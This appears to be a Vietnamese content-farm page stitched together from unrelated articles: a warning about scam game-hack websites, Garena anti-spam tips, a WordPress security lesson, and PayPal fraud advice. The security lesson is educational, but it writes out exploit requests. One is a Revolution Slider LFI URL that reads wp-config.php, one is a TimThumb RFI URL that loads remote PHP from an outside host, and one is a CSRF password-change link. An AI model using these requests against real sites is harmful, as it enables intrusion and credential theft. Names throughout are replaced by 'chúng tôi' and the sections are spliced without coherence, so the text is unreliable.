Cập nhật nội dung chi tiết về Thông Báo Về Việc Hack Coupon Và Những Website Lừa Đảo Bán Hack Zingspeed mới nhất trên website Honggaitour.com. Hy vọng thông tin trong bài viết sẽ đáp ứng được nhu cầu ngoài mong đợi của bạn, chúng tôi sẽ làm việc thường xuyên để cập nhật nội dung mới nhằm giúp bạn nhận được thông tin nhanh chóng và chính xác nhất.
Những bản hack Coupon hay Zcoin hoặc x6 EXP được tung lên mạng đều là lừa đảo.Cũng như các bạn điều biết việc VNG đã Fix Lỗi làm nhiệm vụ cốt truyện nhận Zcoin . Đây là những website chuyên lừa đảo về những bản hack zingspeed Pro :
http://autosieuvip.forumvi.com
http://loves.123.st/f27-forum
http://hackgameonline.forumvi.com/
http://vinaspeed.blogspot.com
http://prohackgame.forumvi.com/f27-forum
http://hackgametk.forumvi.com/t5-topic
http://diendan.bumha.com
http://hackpro.mov.mn
http://zochoi.net
http://vochoi.com
http://shopac.tk
http://hackvip.mov.mn
http://hackgame.org
http://bakuruhotvn.blogspot.com
http://4rhackgame.123.st/
…v.v.
với những chức năng như :
+ Bug Full N20 + Plugin N20 + Hack Speed Focus + Chặn Đối Phương + Chạy Trước 1 Giây + Tăng Điểm Dance + Combo Skill Dance + X6 Kinh Nghiệm + Hack Cốt Truyện + Miễn Dịch PK
Với những lời giới thiệu hấp dẫn như :
– Hack tốc độ tùy chọn, chạy cực nhanh tùy chỉnh x1, x2, x3….. – Hack full speed chạy với tốc độ cực đỉnh nhanh nhất mọi thời đại mà chắc chắn bạn không thể ngờ tới. – Hack EXP cái này chắc không cần giới thiệu nha – Hack Coupon: chính là chức năng đẳng cấp và khác biệt mà không bản hack nào hiện nay có được, với số coupon cực khủng các bạn có thể hoàn toàn yên tâm không phải lo về coupon được. hack max có thể lên tới 10 triệu coupon/ 1 lần hack ( xài hết hack tiếp nha) – Hack zscoin: chức năng này cho phép bạn hack zscoin để xài tẹc ga mà không lo về tiền bạc, tất cả chức năng đều full và xài như hàng thật 100%. – Hack combo: full combo – Hack N20: full N2o – Hack chạy trước 3 giây
Và lấy những Videos có sẵn trên mạng về làm của mình để lừa mọi người .
Tuyệt đối không nên mua hack từ những website trên để tránh bị lừa đảo . Ai biết mà vẫn mua thì tự hiểu . Ngu thì chết !!!
Share this:
Like this:
Số lượt thích
Đang tải…
Cách Ngăn Chặn Những Tin Nhắn Spam Lừa Đảo
Bạn có thấy ức chế mỗi lần đăng nhập vào lmht lol lại thấy mấy tin nhắc spam, lừa đảo kiểu như ” bạn nhận được quà, hãy đăng nhập tại…“, ” bạn bị cảnh cáo/phạt, hãy đăng nhập … để xóa hình phạt“, ” Chúc mừng…“… Khi bị như vậy bạn thường làm gì? Bỏ qua ư, lần sau nó lại xuất hiện. Hãy làm theo KNG những hướng dẫn xóa chat, những tin nhắn spam để hết gặp các massage khó chịu vậy nha!
1. Những tin nhắn spam lừa đảo này đến từ đâu?
Thông thường, nó là những tài khoản bạn bè của bạn bị đánh cắp, hack khi truy cập những đường dẫn thiếu an toàn
Ngoài ra, có thể bạn để lộ nick của mình nơi công cộng sẽ khiến kẻ xấu để ý, muốn chiếm đoạt
2. Làm sao để ngăn chặn những tin nhắn spam lừa đảo?
Rất đơn giản, bạn có thể làm như sau:
Nếu ở Garena Plus, hãy xóa kết bạn hoặc block nick nào gửi chúng cho bạn
Nếu từ Client lol, bạn cũng xóa kết bạn hay block nick nào gửi cho bạn như vậy
3. Có cách nào phòng tránh những tin nhắn spam lừa đảo vậy không?
Đương nhiên là có, nhưng cũng chỉ 1 phần giải quyết được vấn đề thôi
Không kết bạn quá nhiều. Chỉ những bạn bè của nick bị hack mới bị gửi tin nhắn dạng này. Vì thế, nếu bạn có ít bạn hay có những người bạn biết giữ nick thì chắc chắn bạn sẽ không bao giờ thấy những tin nhắn phiền toái đó nữa.
Không truy cập những đường link lạ hay để lộ nick nơi công cộng. Điều này sẽ giúp nick của bạn không bị soi quá nhiều, tránh tình trạng người lạ tự nhiên kết bạn.
4. Những lưu ý cần thiết
Garena không bao giờ thông báo qua tin nhắn. Những nick dạng như “Thông Báo“, “Garena“, “Tin Nhắn Hệ Thống“, “Riot“, “Garena+ (Beta)“, “canh bao“, “Vietnam Esports“, “Hệ Thống Cảnh Báo“, … đều là giả mạo. Mọi thông tin sẽ được thông báo qua trang chủ, đừng để bị lừa. Thông báo đến bạn sẽ không bao giờ yêu cầu đăng nhập để nhận quà hay làm gì đó.
Trang web chính thống của Garena là “*.garena.vn/*” và trang đăng nhập là “*.garena.com/*” không có những dấu “-” hay “_” đâu. Những web lừa đảo dạng ” chúng tôi ” hay “lienminhgarena” hay những đuôi khác như “weebly“, “blogspot“, “wordpress“, “xyz“, “net“,… đều là giả mạo
Những Cách Thức Hack Website Phổ Biến
Khi Website bị hack, chúng ta thường nghĩ mình dùng code bị nhiễm mã độc (malware)!
Lỗ hổng bảo mật trên code sẽ giúp Hacker thực hiện các phương pháp tấn công để chèn malware và website!
Trong Topic đầu tiên của chuyên đề Bảo mật Website – Khóa học Pro WP Master, chúng ta sẽ tìm hiểu các hình thức hack website phổ biến nhất hiện nay.
Chúng ta cũng sẽ làm chủ plugin bảo mật iThemes Security Free và Pro (trong VIP CLUB) để bổ sung các phương pháp bảo mật hiệu quả nhất cho WordPress.
Cuối chuyên đề sẽ là các phương pháp backup tự động và restore khi gặp sự cố – cũng như hướng dẫn quét malware và phục hồi Website WordPress bị nhiễm mã độc!
Hack là hành động thâm nhập trái phép vào phần cứng hoặc phần mềm.
Hack Website là xâm nhập trái phép vào Website, truy cập vào các khu vực mà người dùng bình thường không được phép như hosting, trang quản trị, soạn thảo…
Hack website cũng bao gồm hành động can thiệp vào mã nguồn, database và chỉnh sửa nội dung và thay đổi các tính năng của Website trái phép.
Mục đích Hack Website là gì?
Vào những năm đầu của kỷ nguyên Web, thì các tay hacker tấn công khai thác các lỗ hổng bảo mật trên Website mục đích chỉ để thể hiện số má – hoặc phá hoại, có thể để cảnh báo các lỗ hổng bảo mật mà quản trị web không biết.
Bạn có thể thấy các vụ tấn công vào Website các chính phủ, tập đoàn hoặc tiêu biểu ở VN là tấn công vào Website của bộ Giáo dục & Đào tạo.
Các lỗ hổng bảo mật trên Website – dù dùng mã nguồn gì thì cũng luôn luôn tồn tại, vấn đề là nó có được phát hiện hay không thôi.
Đôi khi, các lỗ hổng bảo mật bắt nguồn từ các lỗi cực kỳ sơ đẳng, ví dụ như lưu thông tin đăng nhập trên máy tính, điện thoại rồi mang ra tiệm sửa, … hoặc lỗ hổng do code cẩu thả gây ra…
Nhưng website đó không quan trọng?
Khi mới bắt đầu tạo Website, chúng ta thường nghĩ Web đó chỉ là web mẫu, có bị hack cũng không sao. Nhưng khi một website bị thâm nhập, hacker sẽ cài mã độc lên hosting và âm thầm lây nhiễm lên toàn bộ các Website khác sau này, ….
Khi một Website bị chiếm quyền, thì hacker có thể dùng các phương pháp tấn công Local Attack rất phổ biến để thực thi các lệnh tấn công toàn bộ các Website khác trên cùng gói Hosting.
Vô số tác hại xảy ra khi một website bảo mật kém nằm trên cùng hosting/vps với các Websites quan trọng khác, không chỉ lây nhiễm mã độc mà còn khiến nguy cơ các Website khác bị Google cấm cửa chỉ vì một site demo vô thưởng vô phạt bạn tạo ra trước đó.
Các phương thức hack Website phổ biến nhất 2019
Dù cách thức thực hiện hack Website vô cùng đa dạng, nhưng chung qui, có các hình thức phổ biến chiếm hầu hết các vụ tấn công bảo mật!
Có 2 kiểu tấn công là:
Access Control: tìm cách truy cập trái phép vào tài khoản quản trị hosting/vps hay website bằng cách dò thông tin đăng nhập. Tiêu biểu là cách tấn công website nổi tiếng Brute Force Attack.
Software Vulnerabilities – Code Injection: khai thác lỗ hổng bảo mật trên phần mềm, code để tấn công vào website, cài các phần mềm độc hại (malware) để thực hiện các tác vụ xấu. Tiêu biểu loại này là SQL Injection (SQLi), tấn công XSS, LFI (Local File Inclusion) và RFI (Remote File Inclusion).
Dù là kiểu tấn công nào, thì cuối cùng, kết quả thường là Website của bạn sẽ bị chèn mã độc, để hacker có thể để lại một backdoor cho phép họ thâm nhập sau này, hoặc mã độc âm thầm thực hiện các tác vụ gây hại trên website.
Chúng ta sẽ tìm hiểu về Mã độc trên Website – Malware trong topic tiếp theo.
1. Tấn công Dò mật khẩu – Brute Force Attack
Đây là kiểu tấn công tưởng là cơ bản – nhưng hiệu quả cao nhất.
Brute Force Attack là kiểu tấn công bằng phương pháp dò mật khẩu, với các thuật toán tự động thử các chuỗi mật khẩu khác nhau, bao gồm số, chữ cái – chữ cái & số….
Về lý thuyết, nếu có đủ thời gian, thì Brute Force cuối cùng sẽ tìm được mật khẩu chính xác.
Không phải như nhiều người nghĩ Brute Force Attack là ‘đoán’ mật khẩu, mà thực tế có các chương trình với thuật toán dò mật khẩu ‘máu lạnh’ – với xác xuất bắt được các mật khẩu yếu rất cao.
Nếu bạn dùng tài khoản kiểu admin/ password, admin/ 123456, admin/ 123abc… thì xem như cúng Website cho Hacker rồi.
Để check xem thời gian trung bình dò một mật khẩu, bạn có thể kiểm tra ở đây:
Password check – Kespersky Lab
Với một phần mềm mà hacker nào cũng có thể viết hoặc tìm được trên mạng, được hacker cung cấp một dải IP hay danh sách domain lấy từ các nguồn có sẵn, thì danh sách Website bị thâm nhập nhiều như lá mùa thu, tất cả bắt nguồn từ thói quen tạo tài khoản rất ngây thơ mà vẫn còn một số lượng lớn người dùng mắc phải.
Brute Force Attack qua XML-RPC trên WordPress
Thông thường phương thức tấn công dò mật khẩu Brute Force Attack được thực hiện bằng cách gởi thông tin username/ password trực tiếp tới trang đăng nhập WordPress, mặc định là ten-mien/wp-admin hoặc ten-mien/wp-login.php.
Để phòng chống, chúng ta thường đổi đường dẫn đăng nhập (dùng plugin iThemes Security chẳng hạn), hoặc thêm tính năng mật khẩu 2 lớp (Two Factor Authentication), hoặc thêm Captcha checkbox….
Nhưng, còn một kiểu Brute Force Attack khác, đó là qua XML-RPC!
XML-RPC là gì?
XML-RPC là một giao thức gọi thủ tục từ xa, cho phép thực hiện các request HTTP theo một tập lệnh XML được mã hóa.
Điểm đặt biệt là của XML-RPC là phương thức system.multicall, cho phép gởi nhiều tổ hợp tham số trong mỗi request.
XML-RPC không chỉ dùng trong WordPress mà còn hỗ trợ trên nhiều CMS và ngôn ngữ lập trình Web phổ biến khác. XML-RPC hiện nay không còn quá cần thiết, chỉ có một số ít plugin còn cần tính năng này (như Jetpack). Nhưng nó hiện vẫn được kích hoạt tự động trong WordPress Core.
Trong WordPress, XML-RPC là tính năng cho phép kết nối với WordPress từ các ứng dụng bên ngoài để đăng bài (như WordPress Apps trên Apple App Store..)
Đây là tính năng có từ thời việc kết nối Internet còn chậm, người dùng soạn thảo sẵn bài viết trên máy tính và dùng XML-RPC để kết nối với Website và đăng bài thay vì mở trình duyệt web và soạn thảo trực tiếp như hiện nay.
Từ năm 2015, hacker đã lợi dụng phương thức system.multicall của XML-RPC để thực hiện các truy vấp dò mật khẩu quản trị.
Như vậy, chỉ mỗi một HTTP request tới XML-RPC, hacker sẽ thử được đến vài trăm cặp user/pass, nên phương thức tấn công này có cường độ gấp trăm lần so với cách tấn công Brute Force Attack qua trang login (ten-mien/wp-admin, ten-mien/wp-login.php,…).
Cách tấn công này cũng không thể chặn bằng phương pháp đổi đường dẫn đăng nhập hoặc Two Authentication, Captcha Checkbox… Vì tính năng XML-RPC khi bật có thể gởi request trực tiếp mà không cần qua bất cứ lớp bảo mật thông thường nào.
Vì cường độ tấn công lớn, lỗ hổng XML-RPC còn được dùng cho mục đích tấn công từ chối dịch vụ (DDos).
Để chống tình trạng này, chúng ta sẽ cần tắt XML-RPC thủ công từ hosting, hoặc tắt một phần – chặn system.multicall bằng các plugin.
Việc này sẽ được hướng dẫn chi tiết trong topic các phương pháp bảo mật trong cùng chuyên đề này.
2. Tấn công vào các lỗ hổng bảo mật trên Hosting
Hosting không chỉ có tài nguyên phần cứng, mà các công nghệ đảm bảo an toàn cho Website càng quan trọng hơn nhiều.
Nếu một máy chủ, vps hoặc gói hosting bị hacker thâm nhập, thì mọi cách thức bảo mật trên Website trở nên vô nghĩa.
Tai hại ở chỗ, nếu Website bị nhiễm malware trên hosting cũ, bạn move qua hosting mới mà chưa gỡ sạch mã độc trong code và database thì mọi thứ vẫn không khác gì.
3. Hack lỗ hổng bảo mật trên Code
Đây là cách thức tấn công Website phổ biến nhất, nó là nguyên nhân chính khiến cho ‘bảo mật Website’ là cuộc chiến trường kỳ, không bao giờ có EndGame.
Mọi ngôn ngữ lập trình đều có điểm mạnh, điểm yếu nên luôn có các phương thức bảo mật để tránh bị hacker lợi dụng.
Vấn đề là các phần mềm, mã nguồn website không thể tự tạo ra mà được code bằng ‘cơm’, nên những lỗ hổng bảo mật – từ sơ đẳng đến hiếm gặp ngày ngày được tạo ra.
Làm developer có dễ không?
Một bạn mới học lập trình, nảy ra ý tưởng về một app với tính năng ‘thú vị’, bèn code ngay và đưa nó lên Store, nhiều người thấy app thú vị nên tải về dùng.
Một anh chàng mới học làm Web WordPress, nghĩ ra một tính năng hay, code ngay một plugin và share cho cộng đồng dùng. Thấy plugin gọn nhẹ mà hay, nhiều người cài đặt và sử dụng một cách thích thú…
Nhưng, code không đơn giản chỉ là thực thi ‘tính năng nào đó’ như mọi người tưởng. Cùng một tính năng, nhưng nếu không hiểu về các cơ chế bảo mật trong lập trình, chúng ta hoàn toàn có thể tạo ra các lỗ hổng để hacker tấn công vào Website.
Rất nhiều ứng dụng, addons/ plugins/ extension… được tạo ra từ những developer tay mơ, kèm theo đó là những lỗi sơ đẳng về bảo mật, xử lý hiệu năng và các lỗi tương thích…
Với người dùng bình thường, họ chỉ quan tâm tới tính năng hay chứ đâu cần biết nó có an toàn không.
Trong thế giới WordPress, hàng triệu Website vẫn vô tư dùng các plugin chỉ có vài reviews trên WP Repository, những plugin được chia sẻ trong những nhóm người dùng nhỏ (ví dụ các plugin do người dùng VN tạo ra để thêm tính năng cho Woo, Flatsome…).
Superman cũng là con người
Mọi Coder đều có lúc bất cẩn, chủ quan. Chưa kể có những vấn đề phát sinh từ thực tế sử dụng nên lỗ hổng bảo mật trong Code luôn luôn xuất hiện.
Vô số các trang Web lớn (kể cả web của Nhà Trắng) gặp sự cố bảo mật, như Facebook gần đây – hacker lợi dụng một số tính năng để ăn cắp – xâm phạm data của người dùng.
Trong WordPress, từ mã nguồn WordPress core, các theme khủng Newspaper by Tagdiv, Porto, Avada hay các plugin Revolution Slider, Contact Form 7, Fancy Box… đều từng có những lỗi bảo mật nghiêm trọng.
Nên cái quan trọng nhất không phải là chọn CMS, theme, plugin… nào không có lỗi bảo mật – mà là “lỗi bảo mật xuất hiện khi nào và cách nào để phòng tránh – khắc phục lỗi bảo mật”
Để hiểu hơn về tấn công vào lỗ hổng bảo mật trên mã nguồn, chúng ta sẽ điểm qua các phương pháp tấn công phổ biến nhât nhiện nay qua lỗi bảo mật trên code.
Dựa vào lỗi bảo mật trong code truy vấn cơ sở dữ liệu SQL, hacker chỉ cần cố tình sử dụng các giá trị và truy vấn đặc biệt để truy xuất – chỉnh sửa – thêm – xóa các dữ liệu trong database.
Trong hình là một ví dụ về tấn công lỗ hổng SQL, khi code không có cơ chế kiểm tra bảo mật chặc chẽ, truy vấn với tham số luôn đúng “1=1” sẽ khiến server trả về tất cả các kết quả hiện có trên database.
Lỗi SQL Injection chiếm một tỉ lệ lớn trong các vụ hack website, và gây ra tác hại rất nghiêm trọng vì khi can thiệp được vào database, hacker gần như nắm toàn quyền kiểm soát website của bạn.
Các cuộc tấn công SQL Injection nổi tiếng
Hầu hết các CMS phổ biến đều đã từng dính các lỗi SQLi, như Magento core, Joomla, Drupal… và vBulleting.
Trong WordPres, gần đây các plugin nổi tiếng như Duplicate Page, Ninja Form, Advanced Custom Form 7 DB, bbPress,…
Nổi tiếng nhất là các cuộc tấn công diện rộng vào lỗ hổng SQLi trên WP Statistics và WP NextGEN Gallery năm 2017, gây ảnh hưởng cả trăm nghìn Websites.
3.2 Cross-Site Scripting (XSS)
Kiểu tấn công này nhằm vào lỗ ổng bảo mật trên code, nhưng dùng các lệnh thực thi phía Client Site (phía người dùng).
Các lệnh mà Hacker dùng thường là các ngôn ngữ client side như Javascript(JS), VBScript hay Flash, HTML… hiện nay thì phổ biến nhất là JS và HTML.
Mục đích của các đoạn mã JS, HTML là:
Ăn cắp cookie của người dùng: cookie này dùng để xác thực danh tính khi đăng nhập vào tài khoản trên các website, có được cookie này, hacker có thể hack vào tài khoản của bạn trên các website đang đăng nhập.
Các loại XSS Attack
Reflected XSS (non – persistant)
Hacker llừa người dùng nhấp vào các đường link của website họ đang đăng nhập.
Ví dụ người dùng đang đăng nhập vào chúng tôi thì hacker sẽ gởi cho họ một đường link tương tự nhưng kèm các tham số để thực thi lện js do hacker tạo ra.
Cụ thể ” https://vietcombank.com.vn/+ js code “
Nếu trang web được code kém bảo mật, không check và làm sạch các tham số trên ULR, thì các lệnh “js code” của hacker sau khi được xử lý bởi Server sẽ trả về trình duyệt thực thi ngay trên trình duyệt của người dùng, và lệnh “js code” này thường có nhiệm vụ ăn cắp và gởi cookie trên trình duyệt tới server của hacker.
Có cookie này hacker sẽ login vào chính tài khoản của người dùng trên chúng tôi mà không cần phải có username & mật khẩu.
Tất nhiên cookie chỉ còn hiệu lực nếu phiên làm việc (session) của người dùng vẫn còn, nếu người dùng đã đăng xuất khỏi chúng tôi trước khi nhấp vào link do hacker gởi thì cookie đó không còn sử dụng để login được nữa.
Cách tấn công này phụ thuộc vào trình độ ‘lừa’ của hacker và sự bất cẩn từ người dùng!
Stored XSS
Stored XSS là kiểu tấn công mà các đoạn mã js được chèn vào code, database của Website luôn. Khi người dùng truy cập vào các tác vụ tương ứng, mã js sẽ thực thi và đánh cắp cookie hoặc đưa các thông tin lừa đảo, redirect sang web xấu..
Kiểu tấn công này hiệu quả cao vì không cần lừa người dùng nhấp vào link nào cả, chỉ cần họ vào trang web có tác vụ bị gài mã js là ok.
Trong WordPress, Stored XSS là lỗi được khai thác thường xuyên nhất, có thể kể đến WordPress phiên bản 5.0.x, Social Warfare, Jetpack, Akismet, bbPress…
DOM-based XSS
Một kỹ thuật tấn công XSS mới, cho phép hacker thay đổi cấu trúc DOM của trang web, khi người dùng nhấp vào phần nội dung thêm vào này, các đoạn mã js độc hại sẽ thực thi.
Nó tương tự với Reflected XSS nhưng thay vì gởi về Server để xử lý và phản hồi lại cho trình duyệt, thì DOM-based XSS thực thi ngay trên trình duyệt mà không cần phải gởi về Servers để xử lý lệnh.
Tác hại của XSS Attack
Kỹ thuật XSS Attack & chống XSS Attack là một trong những kỹ thuật cơ bản trong bảo mật.
Vì code bằng ‘cơm’ nên lỗi XSS có thể gặp ở bất kỳ coder nào, nên XSS attack vẫn còn là kiểu tấn công phổ biến – hiệu quả trong tương lai.
Nạn nhân trực tiếp của XSS Attack chính là người dùng, nhưng nạn nhân gián tiếp và bị ảnh hưởng nặng nề chính là Website dính lỗi XSS.
Người dùng sẽ quay lưng với Website sau khi bị tấn công, ăn cắp dữ liệu…
Nếu mã độc được đưa vào database (Stored XSS) thì Google và các trình duyệt sẽ cấm cửa luôn trang web hoặc toàn bộ Website.
3.3 Cross-Site Request Forgery (CSRF/ XSRF)
Cách thức tấn công CSRF dễ nhầm lẫn với XSS, vì nó dùng thủ đoạn lừa người dùng thực hiện một tác vụ mà chỉ có họ mới có quyền thực hiện.
Tuy nhiên, với XSS – kẻ tấn công thực hiện các lệnh bằng JS ngay trên trình duyệt người dùng. Còn với CSRF – kẻ tấn công gởi các lệnh tới để lừa người dùng thực hiện – các lệnh này có thể là các tác vụ thực hiện trên Server.
Ví dụ, bạn đang đăng nhập vào https://wpbanquyen.com, hacker sẽ gởi cho bạn một link như sau:
https://wpbanquyen.com/account?new_password=abc123Sau khi nhấp vào link, bạn đã thực hiện đổi pass sang abc123 mà không hề biết, lệnh này chỉ có bạn khi đăng nhập mới có quyền thực thi. Thế là hacker dùng pass mới để login vào tài khoản của bạn.
Cách này cũng dùng để chiếm đoạt tiền. Ví dụ bạn đang login vào tài khoản ở ngân hàng Vietcombank, và khi đó, hacker bằng cách nào đó gởi cho bạn một đường link với một cái ảnh (được set kích thước 0.0 để ẩn tấm ảnh đi):
Khi nhấp vào link này, bạn thực hiện lệnh chuyển 1000 vào tài khoản vuihocweb trên cùng hệ thống ngân hàng Vietcombank…
Hiện nay các Website lớn đều có cơ chế chống tấn công CSRF, nhưng vẫn còn vô số lổ hổng để hacker lợi dụng, nên cuộc chiến bảo mật luôn rất căng thẳng.
Lỗi CSRF trên WordPress 5.0.x
Rất may là đội ngũ chuyên gia của Automattic đã nhanh chóng update WordPress lên 5.1.0 để fix lỗ hổng này nên các cuộc tấn công nghiêm trọng đã không xảy ra.
3.4 Inclusion Vulnerabilities: LFI and RFI
Cách thức tấn công cũng dựa vào lỗ hổng bảo mật trên code Website – tức tấn công vào mã nguồn trên máy chủ, hacker sẽ lợi dụng các tính năng được lập trình kém – không bảo mật của App, Website… để thực thi các đoạn mã độc có chủ ý.
Trong thế giới WordPress, cách thức tấn công này cực kỳ phổ biến và thường xuyên. Hacker đặc biệt thích thú với các theme, plugin nổi tiếng, nhiều người dùng vì số lượng nạn nhân đông đảo. Ngay cả WordPress core cũng là mục tiêu của loại tấn công này.
Tấn công LFI – Local File Inclusion là gì?
LFI Attack là kiểu tấn công dựa vào lỗ hổng bảo mật trên code, hacker sẽ thực thi các tác vụ khác có sẵn trên code hoặc xem các thông tin không được phép – đây là các tác vụ chúng ta không muốn thực thi vì bảo mật & ảnh hưởng đến hiệu suất của máy chủ.
Ví dụ, khi ta viết code để mở một file ảnh, thì hacker sẽ mở luôn một file khác trên server (ví dụ file cấu hình hosting, website..).
Lỗ hổng bảo mật LFI của Revolution Slider
Tiêu biểu là sự cố bảo mật của plugin nổi tiếng Revolution Slider năm 2014 – khiến hàng triệu website bị ảnh hưởng. Lỗ hổng trên code khiến hacker hoặc bất kỳ ai cũng có thể mở file cấu hình chúng tôi theo đường link sau:
http://webbihack.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.phpFile cấu hình chúng tôi chứa các thông tin cài đặt của database, key bảo mật. Với các thông tin này hacker có thể thực hiện nhiều cuộc tấn công nguy hiểm tới Website.
Từ các thông tin cấu hình WordPress, và tính năng update của Revolution Slider, hacker chèn backdoor vào code và thực hiện các tác vụ gây hại khác.
Tấn công RFI – Remote File Inclusion là gì?
RFT – tương tự LFI Attack, nhưng được thực hiện bằng cách gọi một File khác nằm ngoài máy chủ (Remote File).
Cách tấn công này hậu quả còn nghiêm trọng hơn LFI, vì remote File là các đoạn code mà hacker làm chủ, họ có thể làm mọi thứ với các đoạn mã này.
Lỗ hổng RFI và cái chết của TimThumb
Tiêu biểu của cuộc tấn công này là sự cố Timthumb – plugin số 1 cho resize ảnh WordPress những năm trước đây.
Lợi dụng lỗi bảo mật trong file chúng tôi hacker có thể upload mã độc từ một file php lưu trữ ở một server bất kỳ (thường giả mạo dưới dạng dịch vụ cdn, dns). Ví dụ:
http://webbihack.com/wp-content/plugins/igit-posts-slider-widget/timthumb.php?src=http://a57fc3picasa.complex.dyndns-pics.com/pics/pics.phpFile php này sẽ giúp hacker cài backdoor và tấn công mọi thứ còn lại trên Website.
Sự cố này được xem là ‘kinh điển’ bởi số lượng Website bị ảnh hưởng lên đến hàng triệu, với rất nhiều Website lớn. Phần còn lại thì vẫn chịu tác động lâu dài các năm sau, vì không để ý đến sự kiện này, hoặc có biết nhưng nghĩ mình không bị ảnh hưởng, dù backdoor đã được cài vào – chỉ chờ một thời điểm thích hợp để hacker làm điều họ muốn sau này.
Sự cố nghiêm trọng đã giết chết một trong những plugin khủng nhất thế giới. Và để lại nhiều bài học hữu ích cho cộng đồng WordPress về sau.
4. Phát tán Code có gài mã độc
Một trong những cách thức tấn công chắc chắn hiệu quả, dễ làm mà bạn chỉ cần xin ở đâu đó đoạn code ‘backdoor’ hoặc malware là có thể sưu tập được danh sách nạn nhân khổng lồ.
Thế giới source code free trên mạng cực kỳ hỗn tạp, mà hacker lẫn các anh chàng tốt bụng đều góp công vào việc phát tán mã độc.
Bạn có thể tìm hàng nghìn Website chia sẻ mã nguồn PHP, CMS, WordPress Themes – Plugins… dưới các cái tên crack, nulled, gpl,…
Tìm hiểu Theme GPL là gì?
Số người dùng code từ các trang chia sẻ này có thể lên đến hàng chục triệu, … chưa kể số người được người quen, bạn bè, ‘đồng râm’ trên các diễn đàn, group chia sẻ cho nhau các resources này…
Với hacker, mua một phần mềm, theme, plugin rồi chèn malware vào rồi phát tán là việc quá dễ dàng. Việc này giống như phát miễn phí cho bạn các ổ khóa thông minh, để rồi hacker muốn vào nhà bạn lúc nào tùy thích.
Website bị hack khi dùng theme, plugin từ dlwordpress Trong topic sau chúng ta sẽ tìm hiểu về các loại Malware có trên Website.
5. Hack vào thiết bị lưu trữ thông tin tài khoản
Nhưng, nếu bạn sở hữu Website, lưu trữ thông tin login trên đt, laptop… mà bị mất hoặc bị hack… hoặc có dịp gởi đi sửa chữa…
Hãy cẩn thận, nếu gặp sự cố thì nhanh tay đổi ngay thông tin login hosting/ vps, domain, quản trị Website.
Tổng kết
Bảo mật Website là một vấn đề phức tạp và liên tục đổi mới, cuộc chiến giữa developer – hacker không bao giờ ngừng và điều cần thiết là chúng ta phải luôn luôn cập nhật các tin tức bảo mật – các lỗ hổng mới (Code Vulnerability – SQL Injection…) để thực hiện các phương pháp bảo mật mới nhất – và xử lý kịp thời khi có sự cố.
Trong topic sau, chúng ta sẽ tìm hiểu về thứ hacker thường để lại sau khi hack Website – đó là Malware – các loại malware phổ biến nhất và cách thức chúng tấn công vào Website – đặc biệt là WordPress!
Bảo Vệ Khỏi Gian Lận Và Lừa Đảo
Chúng tôi luôn nỗ lực để bảo vệ bạn khỏi hành vi gian lận, nhưng mọi giao dịch trực tuyến đều mang một số rủi ro. Để giúp giảm thiểu rủi ro cho doanh nghiệp của bạn, bạn nên chủ động xem xét các giao dịch bán để tìm kiếm dấu hiệu bất thường.
Bạn chưa có tài khoản PayPal? Đăng ký miễn phí
Địa chỉ vận chuyển có gì đó đáng ngờ không?
Đó có phải một nơi có rủi ro cao, như khu nghỉ dưỡng, khách sạn hay một nước có tỉ lệ gian lận cao không? Bạn có nhận được nhiều đơn đặt hàng đến cùng một địa chỉ trong một khoảng thời gian ngắn? Khách hàng muốn giao hàng trong ngày, qua đêm hoặc cấp tốc bất chấp chi phí cao? Khách hàng có yêu cầu đổi địa chỉ giao hàng sau khi thanh toán không?
Đơn hàng quá có hời không?
Đơn hàng có quá lớn so với đơn hàng trung bình từ khách hàng mới không? Có phải cùng một khách hàng (cùng tên, email, số điện thoại hoặc địa chỉ) đã đặt rất nhiều đơn hàng trong thời gian ngắn không? Đây có phải đơn hàng số lượng lớn? (Ví dụ: 10 điện thoại di động hoặc 30 chiếc quần jean.) Gần đây bạn nhận được rất nhiều đơn đặt hàng quốc tế phải không?
Khách hàng có đang cư xử khá kì lạ không?
Bạn có từng bị khiếu nại hoặc bị yêu cầu bồi hoàn bởi khách hàng này? Địa chỉ email có đáng ngờ không, ví dụ knh$$yro123456@gmail.com? Bạn không gửi email tới khách hàng được? Bạn nhận được rất nhiều đơn hàng vào những khung giờ kì lạ (ví dụ 3 giờ sáng)?
Giới hạn tiếp xúc.
Nhằm đảm bảo an toàn cho doanh nghiệp của bạn:Luôn sử dụng tài khoản giao hàng của bạn, không áp dụng đề xuất của khách hàng. Giữ hai danh sách khách hàng – danh sách trắng (với lịch sử thanh toán tốt) và danh sách đen (với những khách từng gian lận thanh toán). Giữ tên, địa chỉ email, số điện thoại, địa chỉ IP và địa chỉ giao hàng của khách trên những danh sách này và tham khảo chéo khi nhận được những khoản thanh toán trong tương lai. Đặt giới hạn cho số lượng và giá trị đơn hàng mà bạn sẵn sàng chấp nhận từ một khách hàng hoặc một địa chỉ trong một ngày, một tuần hoặc một tháng.
1. Hoãn giao hàng
Nếu đó là khoản thanh toán trái phép, chủ tài khoản thường sẽ nhận ra và báo cáo vấn đề rất nhanh.
2. Liên hệ với khách hàng
Gọi hoặc gửi email cho khách hàng để hỏi một vài câu hỏi, nhằm đảm bảo mọi thứ đều ổn.
3. Hoàn tiền cho giao dịch
Nếu bạn không cảm thấy hài lòng với đơn hàng, bạn có thể từ chối. Bạn chỉ cần hoàn tiền giao dịch qua PayPal.
Bảo vệ người bán PayPal.
Khi bạn nhận thanh toán qua PayPal, các giao dịch đủ điều kiện có thể được bảo vệ khỏi các khoản thanh toán trái phép. Bạn nên cố gắng để nhận diện các giao dịch gian lận, nhưng nếu không may gặp phải, chúng tôi sẽ luôn bảo vệ bạn.
Tìm hiểu thêm về Bảo vệ người bán PayPal
Người mua yêu cầu bạn sử dụng địa chỉ giao hàng của họ để họ có thể được hưởng ưu đãi.
Tại sao? Nếu bạn sử dụng tài khoản của người mua, họ có thể đổi địa chỉ đơn hàng sang một địa chỉ khác mà không báo cho bạn, sau đó nói rằng họ không hề nhận được hàng. Do không đủ thông tin nên giao dịch đó sẽ không đủ điều kiện để được áp dụng chính sách Bảo vệ người bán.
Người mua đặt hàng và cho địa chỉ giao hàng sai.
Tại sao? Khi gói hàng không thể giao được tới địa chỉ đó, khách hàng sẽ liên hệ với người vận chuyển để cung cấp địa chỉ mới. Khách nhận được hàng, nhưng vẫn báo họ chưa nhận được gì. Do địa chỉ giao hàng đã thay đổi nên bạn sẽ không thể đáp ứng điều kiện của chính sách Bảo vệ người bán.
